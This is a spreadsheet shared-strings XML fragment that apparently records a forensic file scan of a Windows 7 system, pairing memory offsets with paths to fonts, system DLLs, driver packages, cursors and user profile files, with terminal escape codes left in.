  <si>
    <t>0xdefd0ec8</t>
  </si>
  <si>
    <t>\Windows\Fonts\arialbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd1258</t>
  </si>
  <si>
    <t>\Windows\Fonts\impact.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd1438</t>
  </si>
  <si>
    <t>\Windows\Fonts\euphemia.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd1680</t>
  </si>
  <si>
    <t>\Windows\Fonts\gautami.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd1738</t>
  </si>
  <si>
    <t>\Windows\Fonts\dokchamp.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd1a70</t>
  </si>
  <si>
    <t>0xdefd1ec8</t>
  </si>
  <si>
    <t>0xdefd1f80</t>
  </si>
  <si>
    <t>\Windows\Fonts\courbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd2038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\wlanapi.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd2250</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_smsvchost_3.0.0.0_0409_2d6da1915cb5fdbb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd2940</t>
  </si>
  <si>
    <t>0xdefd2f80</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mcx2.inf_x86_neutral_8cf9cade8f7bba56\Mcx2.inf_x001B_[0</t>
  </si>
  <si>
    <t>0xdefd31b0</t>
  </si>
  <si>
    <t>\Windows\System32\framedynos.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd3498</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_ultimaten_709f71531a183209.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd3730</t>
  </si>
  <si>
    <t>0xdefd3880</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_ultimatee_709f603d1a184baa.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd3c68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_starter_d5453e15283eab7b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd42a0</t>
  </si>
  <si>
    <t>\Windows\System32\wbem\wmipcima.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd43c8</t>
  </si>
  <si>
    <t>0xdefd47f0</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\wnetvsc.inf_x86_neutral_548addf09cb466fa\wnetvsc.</t>
  </si>
  <si>
    <t>0xdefd4f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_msdtc_bridge_3.0.0.0_0409_5d6037fd7f35c3ab.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd52b0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\adsldpc.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd6290</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_professionale_e0db4d0dc779aff1.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xdefd6678</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_homepremium_703e4180a32e263d.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xdefd6940</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00f.inf_x86_neutral_b94365c0e502f290\prnca00</t>
  </si>
  <si>
    <t>0xdefd6a60</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_homepremiumn_35794fa9aba46689.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xdefd6e00</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\twext.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd6f80</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\certmgr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd7278</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_.net_data_provider_for_oracle_0409_1ac885a6f00b112b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd74e0</t>
  </si>
  <si>
    <t>0xdefd78e0</t>
  </si>
  <si>
    <t>0xdefd79c0</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\napdsnap.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd7c08</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\WFSR.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd7e50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmhayes.inf_x86_neutral_e814828f9fb0d4df\mdmhaye</t>
  </si>
  <si>
    <t>s.inf_x001B_[0K_x001B_[53</t>
  </si>
  <si>
    <t>0xdefd8238</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\sermouse.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd8c98</t>
  </si>
  <si>
    <t>\Vboxsvr\d_drive\Imager_Lite_3.1.1\icuuc44.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd9380</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en_9da4492827ac64e5.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd9768</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_ultimate_1ea73fcaaf270754.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd9a30</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_0276fc3b3ea60d41\nvraid.in</t>
  </si>
  <si>
    <t>0xdefd9b50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_oem_ultimaten_1ea73fcb54424f7e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefd9e18</t>
  </si>
  <si>
    <t>0xdefda038</t>
  </si>
  <si>
    <t>\Windows\Fonts\iskpotab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefda3d0</t>
  </si>
  <si>
    <t>0xdefda970</t>
  </si>
  <si>
    <t>\Windows\Fonts\gautamib.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdac30</t>
  </si>
  <si>
    <t>\Windows\Fonts\Vanib.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdb280</t>
  </si>
  <si>
    <t>\Windows\Fonts\kalinga.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdbbe8</t>
  </si>
  <si>
    <t>\Windows\Fonts\LaoUI.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdbca0</t>
  </si>
  <si>
    <t>\Windows\Fonts\kalingab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdbd58</t>
  </si>
  <si>
    <t>\Windows\Fonts\iskpota.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdc3e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\kartikab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdc688</t>
  </si>
  <si>
    <t>\Windows\Fonts\latha.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdc740</t>
  </si>
  <si>
    <t>\Windows\Fonts\KhmerUI.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdcbd8</t>
  </si>
  <si>
    <t>\Windows\Fonts\kartika.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdcf80</t>
  </si>
  <si>
    <t>\Windows\Fonts\lathab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdd7f8</t>
  </si>
  <si>
    <t>\Windows\Fonts\LaoUIb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefddb40</t>
  </si>
  <si>
    <t>\Windows\Fonts\KhmerUIb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefddf80</t>
  </si>
  <si>
    <t>\Windows\Fonts\mangalb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefde268</t>
  </si>
  <si>
    <t>\Windows\Fonts\mangal.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefde5a0</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoescb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefde808</t>
  </si>
  <si>
    <t>\Windows\Fonts\nyala.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefde930</t>
  </si>
  <si>
    <t>0xdefde9e8</t>
  </si>
  <si>
    <t>\Windows\Fonts\lucon.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdf038</t>
  </si>
  <si>
    <t>\Windows\Fonts\ntailu.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdf360</t>
  </si>
  <si>
    <t>\Windows\Fonts\mvboli.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdfac0</t>
  </si>
  <si>
    <t>\Windows\Fonts\monbaiti.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdfb78</t>
  </si>
  <si>
    <t>\Windows\Fonts\himalaya.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefdfc68</t>
  </si>
  <si>
    <t>\Windows\Fonts\phagspab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe0120</t>
  </si>
  <si>
    <t>\Windows\Fonts\raavi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe01d8</t>
  </si>
  <si>
    <t>\Windows\Fonts\phagspa.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe0390</t>
  </si>
  <si>
    <t>\Windows\Fonts\plantc.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe07b8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\tsusbflt.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe0928</t>
  </si>
  <si>
    <t>\Windows\Fonts\ntailub.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe0eb8</t>
  </si>
  <si>
    <t>\Windows\Fonts\raavib.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe1398</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_servicemodeloperation_3.0.0.0_0000_9b92bb9ad51f70d3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe1550</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_printer_en-us_211a053df7b8c611.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe1670</t>
  </si>
  <si>
    <t>0xdefe17b8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_devicecenter_0e1655bf357f4c22.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe1d00</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_security_audit_073f574e8f328f85.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe1f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_system_homegroup_1909584eb21c73e3.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe2438</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_globalization_mct_mct-us_wallpaper_fd038f79a93f8240.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe2750</t>
  </si>
  <si>
    <t>0xdefe2a38</t>
  </si>
  <si>
    <t>0xdefe2f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_diagnostics_scheduled_maintenance_en-us_1c00802b579d904e.cdf-ms_x001B_[0</t>
  </si>
  <si>
    <t>0xdefe30f8</t>
  </si>
  <si>
    <t>0xdefe3e80</t>
  </si>
  <si>
    <t>\Windows\System32\wmi.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe43c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_hu-hu_48503bf27c4f51d7.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe4660</t>
  </si>
  <si>
    <t>0xdefe47b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_hr-hr_485036ac7c4f596f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe4b98</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_he-il_48502d1c7c4f6669.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe4f80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_fr-fr_448347788202c03b.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe5038</t>
  </si>
  <si>
    <t>0xdefe52b0</t>
  </si>
  <si>
    <t>0xdefe54d0</t>
  </si>
  <si>
    <t>0xdefe5638</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Workflow.Activities\v4.0_4.0.0.0__31bf3856ad36</t>
  </si>
  <si>
    <t>4e35\System.W</t>
  </si>
  <si>
    <t>s.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe56f0</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Instrumentation\v4.0_4.0.0.0__b77a5</t>
  </si>
  <si>
    <t>ystem.Manag</t>
  </si>
  <si>
    <t>ement.</t>
  </si>
  <si>
    <t>Instrumentation.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe5920</t>
  </si>
  <si>
    <t>0xdefe59d8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Messaging\v4.0_4.0.0.0__b03f5f7f11d50a3a\Syste</t>
  </si>
  <si>
    <t>m.Messaging.d</t>
  </si>
  <si>
    <t>0xdefe5bf8</t>
  </si>
  <si>
    <t>0xdefe5e18</t>
  </si>
  <si>
    <t>0xdefe6538</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\monitor.sys_x001B_[0K_x001B_[114G</t>
  </si>
  <si>
    <t>0xdefe68a0</t>
  </si>
  <si>
    <t>0xdefe6aa0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_media_landscape_e9488ca8249a3acf.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe6db8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_schemas_availablenetwork_aaf14dcc87fea431.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe6e70</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\cdrom.inf_x86_neutral_6381e09675524225\cdrom.inf_x001B_</t>
  </si>
  <si>
    <t>0xdefe7258</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\serscan.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe73a8</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmcommu.inf_x86_neutral_2f1d25831bc469b5\mdmcomm</t>
  </si>
  <si>
    <t>0xdefe7970</t>
  </si>
  <si>
    <t>\Program Files\Internet Explorer\IEShims.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe7a28</t>
  </si>
  <si>
    <t>0xdefe7c70</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\puiobj.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe7e50</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnlx00z.inf_x86_neutral_fa9c724522edf9cf\prnlx00</t>
  </si>
  <si>
    <t>0xdefe8038</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_microsoft.net_framework_v2.0.50727_mui_0409_fbbb44c0c63bd26c.cdf-m</t>
  </si>
  <si>
    <t>0xdefe8408</t>
  </si>
  <si>
    <t>0xdefe84d0</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EDC238BFF48A31D55A97E1E938</t>
  </si>
  <si>
    <t>92934B_C31B24</t>
  </si>
  <si>
    <t>98754E34057</t>
  </si>
  <si>
    <t>3F1336</t>
  </si>
  <si>
    <t>DE607D619_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe8830</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msvidc32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe89c8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_remotepackages_a62bd8dd89fea431.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe8ca0</t>
  </si>
  <si>
    <t>0xdefe8eb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_da-dk_40b64d5e87b63595.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe9348</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoesc.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefe9618</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoeuiz.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefea290</t>
  </si>
  <si>
    <t>0xdefea640</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoeuil.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefea918</t>
  </si>
  <si>
    <t>\Windows\Fonts\segoeuii.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefeb038</t>
  </si>
  <si>
    <t>\Windows\Fonts\taileb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefeb310</t>
  </si>
  <si>
    <t>\Windows\Fonts\shruti.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefeb6e8</t>
  </si>
  <si>
    <t>\Windows\Fonts\sylfaen.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefeb8a0</t>
  </si>
  <si>
    <t>\Windows\Fonts\utsaahi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefebb80</t>
  </si>
  <si>
    <t>\Windows\Fonts\seguisb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefebc38</t>
  </si>
  <si>
    <t>0xdefec3c0</t>
  </si>
  <si>
    <t>\Windows\Fonts\tungab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefec8d8</t>
  </si>
  <si>
    <t>\Windows\System32\C_28591.NLS_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefecc38</t>
  </si>
  <si>
    <t>\Windows\Fonts\seguisym.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefed488</t>
  </si>
  <si>
    <t>\Windows\Fonts\timesbi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefed540</t>
  </si>
  <si>
    <t>\Windows\Fonts\taile.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefed7d8</t>
  </si>
  <si>
    <t>\Windows\System32\schannel.dll_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefed890</t>
  </si>
  <si>
    <t>\Windows\Fonts\timesi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefedb40</t>
  </si>
  <si>
    <t>0xdefede70</t>
  </si>
  <si>
    <t>\Windows\Fonts\shrutib.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefee6e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\timesbd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefeeb70</t>
  </si>
  <si>
    <t>\Windows\Fonts\tunga.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefef3f0</t>
  </si>
  <si>
    <t>\Windows\Fonts\Shonar.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefef6a8</t>
  </si>
  <si>
    <t>\Windows\Fonts\msyi.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefef8e0</t>
  </si>
  <si>
    <t>\Windows\Fonts\vrindab.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefefb20</t>
  </si>
  <si>
    <t>\Windows\Fonts\Shonarb.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdefefbd8</t>
  </si>
  <si>
    <t>\Windows\Fonts\vrinda.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff01f8</t>
  </si>
  <si>
    <t>\Windows\System32\drivers\en-US\parvdm.sys.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff0628</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\tapi32.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff0808</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\Memory Diagnostics Too</t>
  </si>
  <si>
    <t>l.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff0be8</t>
  </si>
  <si>
    <t>\Windows\Microsoft.NET\assembly\GAC_MSIL\WindowsFormsIntegration\v4.0_4.0.0.0__31bf3856ad364e3</t>
  </si>
  <si>
    <t>5\WindowsForm</t>
  </si>
  <si>
    <t>sIntegratio</t>
  </si>
  <si>
    <t>n.dll_x001B_</t>
  </si>
  <si>
    <t>0xdeff1298</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmomrn3.inf_x86_neutral_d41ffd65fdae5d15\mdmomrn</t>
  </si>
  <si>
    <t>0xdeff1560</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmdp2.inf_x86_neutral_b7c1bc32f986a5b3\mdmdp2.in</t>
  </si>
  <si>
    <t>0xdeff1680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ja-jp_4c1d2478769bf2f4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff1a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_it-it_4a36b1ca7975a0f9.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff1e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_inetsrv_e6240a381854fe3d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff2100</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\batmeter.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff2380</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\msgsm32.acm.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff25d8</t>
  </si>
  <si>
    <t>0xdeff28c0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_migration_wtr_ee7f023c51db84c1.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff2a28</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\oobefldr.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff2cb8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_servicemodeloperation_3.0.0.0_0409_9b92ccb8d51f570e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff3038</t>
  </si>
  <si>
    <t>\Windows\rescache\rc0004\Segment0.toc_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff3298</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migration_wsmt_rras_dlmanifests_3797d36d4dbe18ed.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>_x001B_[0K_x001B_[109G</t>
  </si>
  <si>
    <t>0xdeff3560</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\prnca00e.inf_x86_neutral_a70781c21927bfb2\prnca00</t>
  </si>
  <si>
    <t>0xdeff3680</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migration_en-us_815d10948a0810a2.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff3a68</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migration_927a21df1acd7c18.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff3e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_manifeststore_7d35b12f9be4c20e.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff4928</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_startern_d5453e150472d33d.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff4b10</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_en-us_licenses_eval_professional_00fb94bfbbd51045.cdf-ms_x001B_</t>
  </si>
  <si>
    <t>0xdeff5038</t>
  </si>
  <si>
    <t>\Windows\System32\en-US\onex.dll.mui_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff5ba8</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_inf_pnrpsvc_0000_43733b07fe2eb83f.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff5e50</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_servicing_fc2045b9046cc796.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff6190</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\mdmgl005.inf_x86_neutral_8b56291bfd2a4061\mdmgl00</t>
  </si>
  <si>
    <t>0xdeff62b0</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_shared_res_791e6438104a0cf8.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff6698</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_shared_5a5b3a5824d8fee4.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff6a80</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_ime_imetc10_applets_93adac07b5e841fb.cdf-ms_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff6d48</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\umpass.inf_x86_neutral_8f915e601c25e75b\umpass.in</t>
  </si>
  <si>
    <t>0xdeff7180</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-bluetooth-config_40d</t>
  </si>
  <si>
    <t>5c57bfa898bfd</t>
  </si>
  <si>
    <t>0xdeff7568</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-windows-adfs-dl_893986f097ae</t>
  </si>
  <si>
    <t>8ea9.cdf-ms_x001B_[</t>
  </si>
  <si>
    <t>0xdeff7898</t>
  </si>
  <si>
    <t>\Windows\System32\DriverStore\FileRepository\bthspp.inf_x86_neutral_c702854f7c2d88b2\bthspp.in</t>
  </si>
  <si>
    <t>0xdeff7950</t>
  </si>
  <si>
    <t>\Windows\winsxs\FileMaps\$$_system32_migwiz_dlmanifests_microsoft-activedirectory-webservices-</t>
  </si>
  <si>
    <t>dl_b2cdce29af</t>
  </si>
  <si>
    <t>b29e47.cdf-</t>
  </si>
  <si>
    <t>0xdeff7f80</t>
  </si>
  <si>
    <t>0xdeff8780</t>
  </si>
  <si>
    <t>0xdeff9e00</t>
  </si>
  <si>
    <t>\Windows\Fonts\tahomabd.ttf_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeff9eb8</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_helpsel.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffa490</t>
  </si>
  <si>
    <t>\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\0</t>
  </si>
  <si>
    <t>0010005.dir_x001B_[</t>
  </si>
  <si>
    <t>0xdeffbbc0</t>
  </si>
  <si>
    <t>0xdeffc168</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_busy.ani_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffc220</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_arrow.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffc3b0</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_up.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffc578</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_nesw.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffc630</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_ns.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffc918</t>
  </si>
  <si>
    <t>0xdeffc9d0</t>
  </si>
  <si>
    <t>0xdeffca88</t>
  </si>
  <si>
    <t>\Users\Wilfred\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffd408</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_ew.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffd820</t>
  </si>
  <si>
    <t>0xdeffda68</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_nwse.cur_x001B_[0K</t>
  </si>
  <si>
    <t>0xdeffe4b8</t>
  </si>
  <si>
    <t>\Windows\Cursors\aero_working.ani_x001B_[0K</t>
  </si>
  <si>
